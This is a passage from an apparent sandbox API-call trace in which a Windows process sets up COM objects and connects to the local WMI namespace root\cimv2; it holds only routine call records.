	[0167.292] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetDemultiplexedStub") returned 0x642ffff2060
	[0167.292] CoTaskMemFree (pv=0x1b828660) 
	[0167.424] CoTaskMemAlloc (cb=0x17) returned 0x1b828660
	[0167.425] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateInstanceEnumWmi") returned 0x642ffff1760
	[0167.425] CoTaskMemFree (pv=0x1b828660) 
	[0167.595] CoTaskMemAlloc (cb=0x14) returned 0x1b828660
	[0167.595] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateClassEnumWmi") returned 0x642ffff18c0
	[0167.595] CoTaskMemFree (pv=0x1b828660) 
	[0167.942] CoTaskMemAlloc (cb=0xe) returned 0x1b828660
	[0167.943] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecQueryWmi") returned 0x642ffff1a20
	[0167.943] CoTaskMemFree (pv=0x1b828660) 
	[0168.226] CoTaskMemAlloc (cb=0x1a) returned 0x1b824b00
	[0168.227] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecNotificationQueryWmi") returned 0x642ffff1b90
	[0168.227] CoTaskMemFree (pv=0x1b824b00) 
	[0168.891] CoTaskMemAlloc (cb=0x10) returned 0x1b828660
	[0168.892] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutInstanceWmi") returned 0x642ffff1d00
	[0168.892] CoTaskMemFree (pv=0x1b828660) 
	[0169.191] CoTaskMemAlloc (cb=0xd) returned 0x1b828660
	[0169.191] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutClassWmi") returned 0x642ffff1e00
	[0169.191] CoTaskMemFree (pv=0x1b828660) 
	[0170.141] CoTaskMemAlloc (cb=0x1a) returned 0x1b824830
	[0170.141] GetProcAddress (hModule=0x642ffff0000, lpProcName="CloneEnumWbemClassObject") returned 0x642ffff1f00
	[0170.142] CoTaskMemFree (pv=0x1b824830) 
	[0170.558] CoTaskMemAlloc (cb=0x12) returned 0x1b828660
	[0170.558] GetProcAddress (hModule=0x642ffff0000, lpProcName="ConnectServerWmi") returned 0x642ffff34c0
	[0170.558] CoTaskMemFree (pv=0x1b828660) 
	[0170.829] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0170.830] IUnknown:QueryInterface (in: This=0x321868, riid=0x3008a28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0170.831] IUnknown:Release (This=0x321868) returned 0x0
	[0172.074] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1c6ec590 | out: lpiid=0x1c6ec590) returned 0x0
	[0172.075] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd01370) returned 0x0
	[0172.103] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01370, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
	[0172.103] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd01370, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd01390) returned 0x0
	[0172.104] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01390, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd01390) returned 0x0
	[0172.111] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01390, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0172.114] WbemDefPath:IUnknown:AddRef (This=0x1cd01390) returned 0x3
	[0172.114] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0172.115] CoGetObjectContext (in: riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1b826e08 | out: ppv=0x1b826e08*=0x321850) returned 0x0
	[0172.115] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01390, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b8286c0) returned 0x0
	[0172.115] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b8286c0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.116] WbemDefPath:IUnknown:Release (This=0x1b8286c0) returned 0x3
	[0172.134] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0172.134] WbemDefPath:IUnknown:AddRef (This=0x1cd01390) returned 0x4
	[0172.134] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01390, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0172.134] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x3
	[0172.134] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x2
	[0172.134] WbemDefPath:IUnknown:Release (This=0x1cd01370) returned 0x0
	[0172.134] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x1
	[0172.136] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0172.136] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0172.136] WbemDefPath:IUnknown:AddRef (This=0x1cd01390) returned 0x2
	[0172.136] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01390, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd01390) returned 0x0
	[0172.136] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x2
	[0172.137] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x1
	[0172.138] CoGetObjectContext (in: riid=0x1c6ebcf8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ebcf0 | out: ppv=0x1c6ebcf0*=0x321868) returned 0x0
	[0172.138] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ebd10 | out: pAptType=0x1c6ebd10*=1) returned 0x0
	[0172.138] IUnknown:QueryInterface (in: This=0x321868, riid=0x3008a28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ebe18 | out: ppvObject=0x1c6ebe18*=0x0) returned 0x80004002
	[0172.138] IUnknown:Release (This=0x321868) returned 0x1
	[0172.139] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6eb380 | out: ppv=0x1c6eb380*=0x1cd01370) returned 0x0
	[0172.139] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01370, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6eb090 | out: ppvObject=0x1c6eb090*=0x0) returned 0x80004002
	[0172.139] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd01370, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eb078 | out: ppvObject=0x1c6eb078*=0x1cd01490) returned 0x0
	[0172.140] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01490, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eaf80 | out: ppvObject=0x1c6eaf80*=0x1cd01490) returned 0x0
	[0172.140] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01490, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6eb000 | out: ppvObject=0x1c6eb000*=0x0) returned 0x80004002
	[0172.140] WbemDefPath:IUnknown:AddRef (This=0x1cd01490) returned 0x3
	[0172.140] CoGetContextToken (in: pToken=0x1c6eac50 | out: pToken=0x1c6eac50) returned 0x0
	[0172.140] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01490, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eac10 | out: ppvObject=0x1c6eac10*=0x1b828700) returned 0x0
	[0172.141] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b828700, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6eac40 | out: pCid=0x1c6eac40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.141] WbemDefPath:IUnknown:Release (This=0x1b828700) returned 0x3
	[0172.141] CoGetContextToken (in: pToken=0x1c6eac20 | out: pToken=0x1c6eac20) returned 0x0
	[0172.141] WbemDefPath:IUnknown:AddRef (This=0x1cd01490) returned 0x4
	[0172.141] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01490, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ead38 | out: ppvObject=0x1c6ead38*=0x0) returned 0x80004002
	[0172.141] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x3
	[0172.141] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x2
	[0172.141] WbemDefPath:IUnknown:Release (This=0x1cd01370) returned 0x0
	[0172.142] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x1
	[0172.142] CoGetContextToken (in: pToken=0x1c6eb950 | out: pToken=0x1c6eb950) returned 0x0
	[0172.142] CoGetContextToken (in: pToken=0x1c6eb890 | out: pToken=0x1c6eb890) returned 0x0
	[0172.142] WbemDefPath:IUnknown:AddRef (This=0x1cd01490) returned 0x2
	[0172.142] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01490, riid=0x1c6eb9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eb9b0 | out: ppvObject=0x1c6eb9b0*=0x1cd01490) returned 0x0
	[0172.142] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x2
	[0172.142] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x1
	[0172.194] CoGetContextToken (in: pToken=0x1c6ebad0 | out: pToken=0x1c6ebad0) returned 0x0
	[0172.194] CoGetContextToken (in: pToken=0x1c6eba10 | out: pToken=0x1c6eba10) returned 0x0
	[0172.194] WbemDefPath:IUnknown:AddRef (This=0x1cd01490) returned 0x2
	[0172.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01490, riid=0x1c6ebb50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ebb30 | out: ppvObject=0x1c6ebb30*=0x1cd01490) returned 0x0
	[0172.195] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x2
	[0172.195] WbemDefPath:IUnknown:AddRef (This=0x1cd01490) returned 0x3
	[0172.195] WbemDefPath:IWbemPath:SetText (This=0x1cd01490, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0172.195] WbemDefPath:IUnknown:Release (This=0x1cd01490) returned 0x2
	[0172.196] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0172.196] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0172.196] WbemDefPath:IUnknown:AddRef (This=0x1cd01390) returned 0x2
	[0172.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd01390, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd01390) returned 0x0
	[0172.196] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x2
	[0172.196] WbemDefPath:IUnknown:AddRef (This=0x1cd01390) returned 0x3
	[0172.196] WbemDefPath:IWbemPath:SetText (This=0x1cd01390, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.196] WbemDefPath:IUnknown:Release (This=0x1cd01390) returned 0x2
	[0172.198] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0172.199] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0172.200] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.204] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0172.204] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0172.204] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.248] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0172.248] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0172.248] IUnknown:QueryInterface (in: This=0x321868, riid=0x3008a28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0172.248] IUnknown:Release (This=0x321868) returned 0x1
	[0172.249] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x1c6ecb80 | out: lpiid=0x1c6ecb80) returned 0x0
	[0172.249] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd017d0) returned 0x0
	[0172.254] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd017d0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0172.254] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd017d0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd116b0) returned 0x0
	[0172.254] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd116b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd116b0) returned 0x0
	[0172.254] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd116b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0172.255] WbemLocator:IUnknown:AddRef (This=0x1cd116b0) returned 0x3
	[0172.255] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0172.255] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd116b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0172.255] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0172.255] WbemLocator:IUnknown:AddRef (This=0x1cd116b0) returned 0x4
	[0172.256] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd116b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0172.256] WbemLocator:IUnknown:Release (This=0x1cd116b0) returned 0x3
	[0172.257] WbemLocator:IUnknown:Release (This=0x1cd116b0) returned 0x2
	[0172.257] WbemLocator:IUnknown:Release (This=0x1cd017d0) returned 0x0
	[0172.257] WbemLocator:IUnknown:Release (This=0x1cd116b0) returned 0x1
	[0172.259] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0172.259] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0172.259] WbemLocator:IUnknown:AddRef (This=0x1cd116b0) returned 0x2
	[0172.259] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd116b0, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd116b0) returned 0x0
	[0172.259] WbemLocator:IUnknown:Release (This=0x1cd116b0) returned 0x2
	[0172.259] WbemLocator:IUnknown:Release (This=0x1cd116b0) returned 0x1
	[0172.259] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0172.260] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0172.260] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.268] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd11720) returned 0x0
	[0172.268] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd11720, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd144f8) returned 0x0
	[0172.448] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd144f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b8484f0) returned 0x0
	[0172.448] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b8484f0, pProxy=0x1cd144f8, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0172.448] WbemLocator:IUnknown:Release (This=0x1b8484f0) returned 0x1
	[0172.448] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd144f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b848530) returned 0x0
	[0172.448] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd144f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b8484f0) returned 0x0
	[0172.448] WbemLocator:IClientSecurity:SetBlanket (This=0x1b8484f0, pProxy=0x1cd144f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.449] WbemLocator:IUnknown:Release (This=0x1b8484f0) returned 0x2
	[0172.449] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x1
	[0172.449] CoTaskMemFree (pv=0x1b844d40) 
	[0172.449] WbemLocator:IUnknown:Release (This=0x1cd11720) returned 0x0
	[0172.449] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd144f8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b848530) returned 0x0
	[0172.449] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0172.467] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0172.469] WbemLocator:IUnknown:AddRef (This=0x1b848530) returned 0x3
